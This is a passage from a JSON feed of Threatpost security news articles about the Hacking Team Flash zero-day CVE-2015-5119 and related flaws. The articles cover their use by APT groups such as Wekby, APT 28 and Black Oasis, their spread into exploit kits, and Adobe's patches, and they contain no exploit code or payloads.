pisloader malware to Wekby because it shared many similar characteristics found within the HTTPBrowser RAT family \u2013 commonly used by Wekby. Palo Alto Networks said the Wekby APT group remains active, targeting many U.S.-based healthcare, telecommunications, aerospace, defense, and high-tech companies.\n\n\u201cThe group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeam\u2019s Flash zero-day exploit,\u201d [according to Palo Alto Networks report on the pisloader](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>). Palo Alto Networks has said that Wekby has often leveraged [the zero-day Adobe Flash Exploit](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>) (CVE-2015-5119) via spear phishing campaigns. That said, Olson told Threatpost researchers couldn\u2019t be sure of the exploit used to gain a foothold in the high-tech firm targeted by Wekby attackers.\n", "cvss3": {}, "published": "2016-05-25T14:58:52", "type": "threatpost", "title": "Wekby APT Gang Seen Using DNS Tunneling for Command and Control", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2016-05-25T20:41:40", "id": "THREATPOST:944377914FB1A58CB3F9F096F78260E0", "href": "https://threatpost.com/wekby-apt-gang-using-dns-tunneling-for-command-and-control/118303/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:36", "description": "Handlers for three major exploit kits have managed to utilize in short order a [zero-day vulnerability in Adobe Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>) uncovered among the 400 Gb of data stolen from Hacking Team.\n\nExperts, including French researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>) and a number of others from security companies, revealed last night that the Angler, Neutrino, and Nuclear kits had incorporated exploits for the zero day, which [Adobe has patched](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>).\n\nThe [Hacking Team breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) was disclosed on Sunday and by Monday afternoon, word of the Flash zero day, along with an unpatched Windows kernel vulnerability, was circulating. Though the Hacking Team data included only a proof of concept that opened the computer\u2019s calculator, an extensive read-me document that accompanied it likely helped pave the way to the exploits.\n\n> Flash 0day from [#HackingTeam](<https://twitter.com/hashtag/HackingTeam?src=hash>) with a nice readme. Works very well on Chrome etc. <http://t.co/nfqck54YhT> [pic.twitter.com/8uAQuUIXGV](<http://t.co/8uAQuUIXGV>)\n> \n> \u2014 webDEViL (@w3bd3vil) [July 6, 2015](<https://twitter.com/w3bd3vil/status/618168863708962816>)\n\nA [Metasploit module](<https://github.com/rapid7/metasploit-framework/commit/2cdaace42f8f121e97f36f37fe1b3835dbeaef0a>) was also developed and integrated into the framework, before integration into the exploit kits, Kafeine told Threatpost via email.\n\nAdobe issued an advisory late Tuesday afternoon that it would today release an updated Flash Player. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.\n\nSecurity company Bromium, meanwhile, published an [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the vulnerability, which is a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\n\u201cHackingTeam\u2019s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine,\u201d Cano wrote. The Bromium analysis provides in-depth detail on the vulnerability and how the Hacking Team PoC exploits it.\n\nCano said the Hacking Team exploits comes with shellcode for 32- and 64-bit Windows machines, as well as Mac OS X 64-bit machines, and mitigation bypasses for Microsoft\u2019s free EMET tool. .\n\n\u201cWe\u2019ve tested this exploit with the latest updated Flash Player 18 and Internet Explorer which indicates that this is clearly a zero day risk to internet users today,\u201d Cano wrote. \u201cThis exploit has the potential to completely own almost any system that it hits, and can be reliably blocked by leveraging robust isolation technologies.\u201d\n\nResearchers from China\u2019s 360Vulcan Team, who cashed in big at this year\u2019s Pwn2Own contest, also published an [analysis](<https://translate.google.com/translate?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=auto&tl=en&u=http://blogs.360.cn/blog/hacking-team-flash-0day/>) of the vulnerability (translated).\n\nHacking Team is a controversial player in security, selling intrusion software flagged by the Wassenaar Arrangement used to monitor users\u2019 computers. It, along with others such as Gamma Corp., has been criticized for selling software that violates not only privacy but human rights; the companies are accused of selling their products to oppressive governments. Among the Hacking Team data were invoices showing sales to the Sudan, Ethiopia and other sanctioned nations, drawing the[ ire of the European Parliament](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>), which yesterday asked some pointed questions about the incident.\n", "cvss3": {}, "published": "2015-07-08T11:19:02", "type": "threatpost", "title": "Hacking Team Flash Zero Day Weaponized in Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "modified": "2015-07-09T13:52:36", "id": "THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "href": "https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:36", "description": "The Wekby APT group, implicated in a number of [targeted attacks against health care organizations such as Community Health Systems](<https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828>) and major pharmaceutical companies, is reportedly making use of the Adobe Flash Player zero-day found in the [Hacking Team data dump](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>).\n\nAccording to Virginia-based security company Volexity, spear phishing messages purporting to be from Adobe have been found spreading a modified version of the Hacking Team exploit that affects Flash Player versions up to 18.0.0.194. Labels found in the code, in fact, refer to Hacking Team, the company said.\n\nInternal emails, sales invoices and other documents leaked since the breach was made public implicate Hacking Team in selling exploits and intrusion software to [oppressive governments and sanctioned countries](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>).\n\nThe spear phishing message found by Volexity urges the victim to download and install an updated version of Flash and includes a link to http://get[.]adobe[.]com that instead redirects the recipient to a site hosted by PEG TECH Inc. The site loads a malicious .swf file exploiting the Flash vulnerability patched yesterday by Adobe.\n\nThe malware executes and connects to a known Webky command and control address hosted in Singapore, Volexity said.\n\n\u201cAny connection involving this IP address or these hostnames should be consider hostile and a likely indicator of compromise,\u201d the company said in its [report](<http://www.volexity.com/blog/?p=158>).\n\nIn the past, the Webky APT group, also known as APT 18, has hosted other malware families from the Singapore IP address, including Poison Ivy and the Gh0st remote access Trojan in this case.\n\nVolexity said that current, patched versions of Flash will display a pop-up dialog with the word \u201cfaile!\u201d prominently displayed.\n\n\u201cIt looks like the attackers may have left a debug message from their testing,\u201d Volexity said. \u201cNot very subtle at all.\n\n\u201cThe attackers are having a field day with this exploit and will not slow down any time soon,\u201d the company said. \u201cPatching is the most prudent course of action to deal with this exploit that is very much in the wild.\u201d\n\nAdobe yesterday [patched the zero day in Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>), CVE-2015-5119, one of 36 vulnerabilities patched in the update. The Hacking Team bug was the only one being publicly exploited. The update patched a mix of vulnerability classes, including memory address randomization issues, heap buffer overflows, memory corruption bugs, security bypass vulnerabilities, same-origin bypasses, and use-after-free flaws.\n\nThe Flash zero day, it was revealed yesterday as well, was quickly [integrated into the major exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>), including Angler, Nuclear and Neutrino, as well as the Metasploit Framework.\n\nSecurity company Bromium, published its [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the zero day, determining it was a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\nMeanwhile, yesterday, Department of Homeland Security\u2019s CERT at the Software Engineering Institute at Carnegie Mellon University released an [advisory](<http://www.kb.cert.org/vuls/id/103336>) warning users about a still unpatched Windows kernel vulnerability that was also part of the Hacking Team data dump.\n\nThe flaw lives specifically in the [Adobe Type Manager kernel module in Windows](<https://threatpost.com/details-available-on-patched-adobe-windows-font-vulnerabilities/113454>); the module provides support for OpenType fonts.\n\n\u201cA memory-corruption flaw in Adobe Type Manager allows for manipulation of Windows kernel memory, which can result in a wide range of impacts,\u201d said the CERT advisory. In this case, a successful exploit such as Hacking Team\u2019s could allow an attacker to bypass browser and operating system sandbox protection to obtain System privileges on a Windows computer.\n\n\u201cWe have confirmed that the exploit code successfully obtains SYSTEM privileges on Windows XP through Windows 8.1 systems, both 32-bit and 64-bit,\u201d CERT said.\n", "cvss3": {}, "published": "2015-07-09T14:50:54", "type": "threatpost", "title": "Wekby APT 18 Exploiting Hacking Team Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "modified": "2015-07-13T18:36:39", "id": "THREATPOST:10AFDF2569BF60140B11198E0B2082D8", "href": "https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "description": "An APT group thought to be tied to Russia is flying against conventional wisdom, having as recently as the last three weeks dropped its sixth zero-day in the past four months.\n\nGiven the underground value of unpatched and unreported vulnerabilities, this is highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nNonetheless, [APT 28](<https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049>), also known by other nicknames such as Tsar Team, Operation Pawn Storm, and Sednit, has been a busy gang targeting government agencies and military operations with a host of Adobe Flash, Microsoft and Java-based zero-days at their disposal.\n\nThis week alone, two zero-days attributed to this team disappeared when they were [patched by Microsoft](<https://threatpost.com/microsoft-patches-hacking-team-windows-kernel-zero-day/113788>) and Oracle in Office and Java respectively. Researchers at [iSight Partners](<http://www.isightpartners.com/2015/07/microsoft-office-zero-day-cve-2015-2424-leveraged-by-tsar-team/>) reported the Office zero-day to Microsoft on June 30 and it was patched on Tuesday in [MS15-070](<https://technet.microsoft.com/en-us/library/security/MS15-070>), an Office security bulletin that patched 13 other vulnerabilities in the software. Later that night, [Oracle erased a Java zero-day](<https://threatpost.com/oracle-patches-java-zero-day/113792>) in its quarterly Critical Patch Update that was used against a U.S.-based defense contractor and foreign military outfits. It was the first Java zero day actively exploited in the wild since 2013, experts said.\n\nAPT 28 keeps a vast arsenal of malware and domains under its control, according to researchers Brian Bartholomew and Jonathan Leathery of iSight.\n\n\u201cThis indicates it\u2019s not a handful of guys; this is an organization managing this stuff,\u201d Bartholomew said, adding that the group has also been known to use cryptocurrency such as Bitcoin to buy domains in order to hide registration information and remain anonymous. \u201cIt\u2019s hard to manage that much infrastructure that they own.\u201d\n\nFive of the half-dozen zero days, Bartholomew said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach.\n\n\u201cThey actually rewrote it, which is interesting. It\u2019s not just a copy of the [Hacking Team] proof of concept with their own shell code added,\u201d Bartholomew said.\n\nThe Office zero day, CVE-2015-2424, was likely still under development since iSight researchers said it was still fairly buggy and unreliable. It was likely spread via spear phishing emails, specifically targeting individuals or groups within sensitive organizations. The lure found by iSight was a Word document purporting to be an analysis of the Iran nuclear deal.\n\n\u201cIt\u2019s a heap corruption vulnerability in Office where it\u2019s mishandling an object in memory, which allowed for remote code execution from the weaponized document,\u201d Leathery said, adding that the message also included a CNN article on the Iran deal published June 28. The likely targets were the former Soviet republic of Georgia.\n\nThe payload is a variant of the Sofacy or Sednit Trojan, which immediately opens a backdoor to a number of attacker-controlled domains where stolen data is sent. Some of the domains, iSight said, are benign or do not belong to the APT group, a false-flag of sorts. The targets are government agencies in Eastern Europe or NATO, along with critical industries such as nuclear, telecommunications, defense industrial base and diplomatic interests.\n\nThe group is not only adept at gathering intelligence from foreign interests, but also focuses on internal dissidents and threats to national security in Russia, iSight said. One counter-terrorism operation attributed to this group is the so-called Cyber Caliphate hacktivist operation, where hackers posing as ISIS supporters set up lures via social media or forums trying to attract those sympathetic to the Islamic State. Once some confidence is established with a target via direct messaging, APT 28 would entice them to install an application that was malicious and allowed them to monitor the dissidents\u2019 activities.\n\nDespite the fact that this particular Office\u2014and Java\u2014zero day has been patched, iSight believes APT 28 is well resourced and has more at its disposal.\n\n\u201cThis throws a wrench in their plans; usually they can get a few months out of a zero day before a patch is out,\u201d Bartholomew said. \u201cIt\u2019s unprecedented using this many zero days, but at the same time, they have access to developers who can build these or have the resources to buy them.\u201d\n", "cvss3": {}, "published": "2015-07-16T13:46:02", "type": "threatpost", "title": "Office, Java Patches Erase Latest APT 28 Zero Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-2424", "CVE-2015-5119"], "modified": "2015-07-21T20:45:15", "id": "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "href": "https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:23", "description": "Adobe today released an [out-of-band Flash Player update](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) addressing a zero-day vulnerability being exploited by a little-known Middle Eastern APT group.\n\nThe group known as Black Oasis was, as recently as this month, using exploits for the flaw to drop FinSpy as a payload. Sold by the controversial German company Gamma International, FinSpy, or FinFisher, is a suite of surveillance and espionage software used to remotely monitor compromised computers. It\u2019s sold to governments and law enforcement around the world, including allegations of sales to oppressive regimes including Egypt, Bahrain, Ethiopia, Uganda and elsewhere.\n\nThe vulnerability, CVE-2017-11292, was privately disclosed Oct. 10 by researchers at Kaspersky Lab, who saw the payload and exploit used against a customer\u2019s network. The attackers spread the exploit via email, embedding the Flash exploit inside an Active X object inside a Word document. Brian Bartholomew, a member of Kaspersky Lab\u2019s Global Research and Analysis Team (GReAT), said retrieval of the payload\u2014which is the latest FinSpy version\u2014is done in multiple stages.\n\nAdobe said Flash version 27.0.0.159 on the desktop, Linux and Google Chrome is affected, as well as version 27.0.0.130 for Edge and Internet Explorer 11 on Windows 10 and 8.1. Users should be sure to be running Flash 27.0.0.170 on all platforms, or heed the advice of many security experts to disable Flash all together. [Flash has been designated for end-of-life](<https://threatpost.com/flashs-final-countdown-has-begun/127475/>).\n\nKaspersky Lab published a [report](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) today about the zero day on Securelist.com.\n\nBlack Oasis is a bit of an enigma among APT groups. The group has been on Kaspersky Lab\u2019s radar for nearly a year, Bartholomew said, and has had at least five zero-day vulnerabilities and exploits at its disposal since 2015, all of which have been disclosed and patched. There is only one known victim of the Flash zero day patched today, he said.\n\n\u201cThese guys are definitely customers of Gamma. They\u2019ve been using FinSpy for maybe the last two years,\u201d Bartholomew said. \u201cThey were also potentially customers of Hacking Team.\u201d\n\nBlack Oasis appears to have made use of a Hacking Team zero day, [CVE-2015-5119](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>), prior to the Italian software company being hacked in the summer of 2015 and having many of its attacks publicly dumped online.\n\n\u201cWe know this group was also using that exploit, which we assume was unique to Hacking Team customers,\u201d Bartholomew said. \u201cThey had access to it prior to the hack. Once the hack happened, I have not seen them using Hacking Team at all but they have been using FinSpy pretty regularly since.\u201d\n\nThe APT group\u2019s targets are government and military organizations in the Middle East, countries in North Africa, as well as some in Russia, Ukraine and elsewhere in Europe.\n\n\u201cFinSpy seems to be their payload of choice,\u201d Bartholomew said.\n\nThis is the second zero-day vulnerability in possession of Black Oasis to be patched in the last month. In September, [FireEye disclosed](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) CVE-2017-8759, which was patched by Microsoft and used to spy on an unnamed Russian individual. The vulnerability was described as a SOAP WSDL parser code injection bug spread via Microsoft Office RTF documents. The code injection was used to download and execute script that included PowerShell commands.\n\n\u201cIn the last two months, they\u2019ve burnt two zero days. It\u2019s very evident they have access to a wide swathe of zero days,\u201d Bartholomew said.\n\nZero days can sell for six or seven figures on gray or black markets. They are a source of constant debate between security and privacy experts and governments who buy these attacks for exclusive use as lawful intercept tools in the name of national security or law enforcement purposes.\n\nWhile Black Oasis may be very well resourced, its operational security may be lacking. For example, the group re-used command and control servers burned by the FireEye disclosure in this recent round of attacks using the Flash zero day.\n\n\u201cThey had right around a month to move their infrastructure, but yet they didn\u2019t,\u201d Bartholomew said.\n\nThe emergency update comes less than a week after Patch Tuesday when for the first time in recent memory, Adobe did not publish any security updates for any of its products.\n", "cvss3": {}, "published": "2017-10-16T11:46:13", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Exploited by Black Oasis APT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2017-11292", "CVE-2017-8759"], "modified": "2017-10-16T11:46:13", "id": "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "href": "https://threatpost.com/adobe-patches-flash-zero-day-exploited-by-black-oasis-apt/128467/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "description": "Adobe has put the two outstanding [Hacking Team Flash Player zero-day vulnerabilities](<https://threatpost.com/hacking-team-promises-to-rebuild-controversial-surveillance-software/113743>) in check.\n\nToday, Adobe released an [updated Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-18.html>) that patches CVE-2015-5122 and CVE-2015-5123, two use-after-free bugs uncovered and exploited by the controversial Italian surveillance software vendor. The bugs were found as researchers combed through the 400 Gb of data stolen from Hacking Team and posted online July 5.\n\nSince the disclosures, three Flash zero days and an unpatched, publicly exploited Windows kernel privilege escalation vulnerability have been emerged from the Hacking Team cache. Adobe has already [patched the first Flash zero day](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>), CVE-2015-5119, and it is unknown whether Microsoft will today patch the Windows 0day as part of its monthly Patch Tuesday security bulletins.\n\nThe Adobe patches come less than 24 hours after browser vendor Mozilla announced that it had [disabled Flash by default in Firefox](<https://threatpost.com/mozilla-disables-flash-in-firefox/113763>). Prominent security figures, such as new Facebook CSO Alex Stamos, have been vocal about Adobe killing off Flash entirely. Flash has long been a favorite target of criminal and nation-state hackers for its cross-platform ubiquity, and constant spate of security vulnerabilities.\n\n[CVE-2015-5122](<http://www.kb.cert.org/vuls/id/338736>), disclosed to Adobe by FireEye, is an [ActionScript 3 opaqueBackground use-after-free bug](<https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html>), while [CVE-2015-5123](<http://www.kb.cert.org/vuls/id/918568>) is a BitmapData use-after free bug. According to the DHS CERT, both bugs can be exploited by an attacker tricking a visitor into landing on a website hosting an exploit, and allow for complete takeover of a compromised machine\n\nExploit kit expert and security researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html>) said the zero day discovered by FireEye has already been integrated into the Angler Exploit Kit, as well as the Metasploit Framework. The first zero-day uncovered in the hack was also quickly [incorporated into popular exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>).\n\nToday\u2019s Flash update, 18.0.0.209, patches versions 18.0.0.203 and earlier for Windows and Macintosh systems, and 18.0.0.204 and earlier for Linux machines.\n\nThe Hacking Team hack was disclosed on July 5 when seemingly all of the company\u2019s internal email, product specs and sales data was posted at numerous sites. Despite company policy stating the contrary, invoices and sales receipts found in the post-breach data dump show that Hacking Team sold its Remote Control System (RCS) tool to sanctioned countries run by oppressive governments, such as Sudan and Ethiopia. Hacking Team said it has ended its business relationships with these countries. RCS is sold to law enforcements and government agencies worldwide as a monitoring tool.\n\nYesterday, Hacking Team renewed its vow to press on as a company and rebuild not only its infrastructure, but RCS from scratch.\n\n\u201cA totally new internal infrastructure is being [built] at this moment to keep our data safe. Of course, our top priority here has been to develop an update to allow our clients to quickly secure their current surveillance infrastructure,\u201d said Hacking Team chief operating officer David Vincenzetti in a statement. \u201cWe expect to deliver this update immediately. This update will secure once again the \u2018Galileo\u2019 version of Remote Control System.\u201d\n\nAdobe today also patched [46 vulnerabilities in Adobe Reader and Acrobat](<https://helpx.adobe.com/security/products/acrobat/apsb15-15.html>), and [two in the Shockwave Player](<https://helpx.adobe.com/security/products/shockwave/apsb15-17.html>).\n\nThe Reader and Acrobat updates patch a number of code execution vulnerabilities, in addition to information disclosure, denial-of-service, and privilege escalation vulnerabilities in versions 11.0.11 and 10.1.14 and earlier for Windows and Macintosh machines.\n\nThe Shockwave update addresses two memory corruption bugs that lead to code execution in versions 12.1.8.158 and earlier, Adobe said.\n", "cvss3": {}, "published": "2015-07-14T11:47:14", "type": "threatpost", "title": "Adobe Patches Hacking Team Zero Days in Flash", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "modified": "2015-07-15T14:15:04", "id": "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835", "href": "https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:32", "description": "Yet another group of attackers has quickly cashed in on one of the Adobe Flash zero days uncovered in the HackingTeam leak and is leveraging it to target Japanese organizations.\n\nLast week researchers determined that attackers were able to compromise two Japanese websites, the country\u2019s International Hospitality and Conference Service Association (IHCSA) and Cosmetech, Inc. to exploit CVE-2015-5122, one of two Flash zero day vulnerabilities Adobe patched last Tuesday.\n\nThe group is hosting their infrastructure between the two Japanese sites, via a strategic web compromise, which has led researchers to believe the attackers are targeting organizations in Japan.\n\n[According to FireEye](<https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715>), who discovered the attacks and claims its observed at least two victims so far, the exploit is a two-step process: Users who visit a particular URL on the IHCSA\u2019s site are redirected to the HackingTeam Adobe Flash framework on Cosmetech\u2019s website. From there, assuming the user is running an old version of Flash, the site drops a malicious .SWF file, which in turn, drops a relatively new strain of malware, SOGU.\n\nWhile the malware \u2013 which also goes by the nickname Kaba \u2013 is a backdoor widely used by Chinese threat groups, researchers couldn\u2019t directly connect any specific Chinese APT group to the campaign outright.\n\nFireEye couldn\u2019t confirm how organizations were targeted but suggests that since other, similar APT groups that have used Hacking Team Flash zero days this month have done so via spearphishing, victims from this campaign may have also been lured with phishing emails.\n\nIt\u2019s been a rocky summer for Adobe; it was about [a week ago](<https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776>) that the company rushed out a new version of Flash that addressed both CVE-2015-5122, first disclosed to Adobe by FireEye, along with another that surfaced in the [HackingTeam breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) earlier this month, CVE-2015-5123.\n\nThe new group is one of several in the wake of the HackingTeam breach to incorporate an Adobe zero day into their campaign.\n\nJust days after the breach came to light, attackers with both [APT 18 and APT 3](<https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715>) began using CVE-2015-5119, the first Flash vulnerability that emerged, to carry out phishing attacks against a slew of organizations. Adobe addressed that vulnerability, along with 46 other bugs in Reader, Acrobat and Shockwave, with a security update [the week before last](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>).\n", "cvss3": {}, "published": "2015-07-20T11:27:15", "type": "threatpost", "title": "New Campaign Targeting Japanese with Hacking Team Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "modified": "2015-07-22T19:23:50", "id": "THREATPOST:30E23091BD920CFE6F579C918001D85D", "href": "https://threatpost.com/new-campaign-targeting-japanese-with-hackingteam-zero-day/113848/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:18", "description": "Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence on machines.\n\nJuan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab\u2019s [Global Research and Analysis Team,](<https://securelist.com/apt-trends-report-q2-2017/79332/>) described some of tactics the researchers have seen in Q2 2017 in [a webinar](<https://www.brighttalk.com/webcast/15591/273279>) Tuesday morning. The company used the webinar and [the quarterly report it was based on](<https://securelist.com/apt-trends-report-q2-2017/79332/>) to help pull back the veil on threats previously covered by its private intelligence reporting service.\n\nA chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.\n\nSofacy, the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) to election hacks, began using two new macro techniques in April. One abused Windows\u2019 certutil utility to extract payloads\u2014the first time the researchers had seen that technique used\u2014another embedded payloads in the EXIF metadata of malicious Office documents.\n\n\u201cAfter we started digging into this we found that they were actually using this technique dating back to December 2016,\u201d Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.\n\nIn June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.\n\nBartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.\n\n\u201cThere were some infrastructure ties there,\u201d Bartholomew said, \u201cThere was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn\u2019t seen before. We don\u2019t know why that\u2019s the case, it could be that they hired a developer who just refuses to write anything but Delphi. Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi\u2014compared to the other Delphocy payload\u2014and ties to the infrastructure to Sofacy.\u201d\n\nEarlier this spring researchers said they were able to make a potential link between Turla, the APT [linked to Moonlight Maze at SAS](<http://the APT linked to Moonlight Maze at SAS earlier this year>) earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.\n\n\u201cWhat\u2019s interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy,\u201d Bartholomew said.\n\nBartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern-speaking group that\u2019s believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.\n\nHe claims the group, which he\u2019s spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. The exploit\u2019s end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.\n\n\u201cWe\u2019re currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months,\u201d Bartholomew said.\n\nCiting their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it\u2019s the first example of a NOBUS\u2014NObody But US backdoor\u2014they\u2019ve seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.\n\nAnother backdoor, Gray Lambert\u2014an extension of the [Lamberts APT](<https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900/>) group\u2014is much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it\u2019s ready to be used.\n\n\u201cWhat makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines,\u201d Guerrero-Saade said. \u201cWith Gray Lambert installed on these machines [attackers] can essentially decide how they\u2019re going to space their payloads, their commands and attacks.\u201d\n\nThe researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It\u2019s likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the [NSO Group to the Mexican government](<https://threatpost.com/mexican-journalists-lawyers-focus-of-government-spyware/126367/>), will remain popular as well, Guerrero-Saade and Bartholomew said.\n\nThe trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it\u2019s a curious question whether or not the technique will ever be embraced by cybercriminals.\n\n\u201cWe\u2019ve been talking about incompetent people entering the ransomware space for a quite some time now,\u201d Guerrero-Saade said, \u201cWe\u2019re going to see people who are poor coders and won\u2019t even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn\u2019t do anything but tries to get money out of na\u00efve or unsuspecting victims. The notion of wipers as ransomware is quite different. It\u2019s an interesting phenomenon.\u201d\n\n\u201cSabotage attacks and wiper attacks are a strange occurrence, they don\u2019t happen that often. I think over 